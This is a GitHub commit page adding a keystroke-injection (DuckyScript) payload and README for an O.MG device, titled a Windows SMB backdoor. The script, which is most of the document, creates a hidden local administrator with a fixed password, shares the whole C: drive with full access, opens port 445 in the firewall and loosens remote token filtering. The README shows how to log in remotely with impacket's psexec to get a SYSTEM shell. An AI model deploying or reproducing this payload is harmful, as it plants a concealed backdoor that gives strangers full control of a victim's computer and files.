Add "Microsoft Windows" SMB Backdoor

1) Adds a user account (OMG_User:OMG_P@ssW0rD).
2) Adds this local user to local administrator group.
3) Shares "C:\" directory (OMG_SHARE).
4) Adds a rule to the firewall.
5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
6) Hides this user account.
pull/22/head^2
TW-D 2022-03-29 15:57:08 -04:00 committed by GitHub
parent 4f2f8dd4b3
commit 31f43e1eca
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 115 additions and 0 deletions

View File

@ -0,0 +1,36 @@
# "Microsoft Windows" SMB Backdoor
- Title: "Microsoft Windows" SMB Backdoor
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows
- Category: Remote Access
## Description
1) Adds a user account (OMG_User:OMG_P@ssW0rD).
2) Adds this local user to local administrator group.
3) Shares "C:\" directory (OMG_SHARE).
4) Adds a rule to the firewall.
5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
6) Hides this user account.
## Exploitation
>
> The connection identifiers will be those defined by the values : **OMG_User** and **OMG_P@ssW0rD**.
>
```
hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./OMG_User:OMG_P@ssW0rD@<TARGET>
C:\WINDOWS\system32> whoami
nt authority\system
```
>
> The connection identifiers and the share name will be those defined by the values : **OMG_SHARE**, **OMG_User** and **OMG_P@ssW0rD**.
>
```
smb://<TARGET>/OMG_SHARE/
```

View File

@ -0,0 +1,79 @@
REM #
REM # Title: "Microsoft Windows" SMB Backdoor
REM #
REM # Description:
REM # 1) Adds a user account (OMG_User:OMG_P@ssW0rD).
REM # 2) Adds this local user to local administrator group.
REM # 3) Shares "C:\" directory (OMG_SHARE).
REM # 4) Adds a rule to the firewall.
REM # 5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
REM # 6) Hides this user account.
REM #
REM # Author: TW-D
REM # Version: 1.0
REM # Category: Remote Access
REM # Target: Microsoft Windows
REM #
REM # TESTED ON
REM # ===============
REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
REM #
REM # REQUIREMENTS
REM # ===============
REM # The target user must belong to the 'Administrators' group.
REM #
REM ######## INITIALIZATION ########
DELAY 1000
DUCKY_LANG US
DELAY 1000
REM ######## STAGE1 ########
GUI r
DELAY 3000
STRING cmd
DELAY 1000
CTRL SHIFT ENTER
DELAY 3000
LEFTARROW
DELAY 5000
ENTER
DELAY 5000
REM ######## STAGE2 ########
STRING NET USER OMG_User OMG_P@ssW0rD /ADD
ENTER
DELAY 1500
STRING NET LOCALGROUP Administrators OMG_User /ADD
ENTER
DELAY 1500
REM ######## STAGE3 ########
STRING NET SHARE OMG_SHARE=C:\ /GRANT:OMG_User,FULL /REMARK:"ORemote MGShare"
ENTER
DELAY 1500
STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Server Message Block for OMG" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
ENTER
DELAY 1500
REM ######## STAGE4 ########
STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
ENTER
DELAY 1500
STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v OMG_User /t REG_DWORD /d 0
ENTER
DELAY 1500
REM ######## FINISH ########
STRING EXIT
ENTER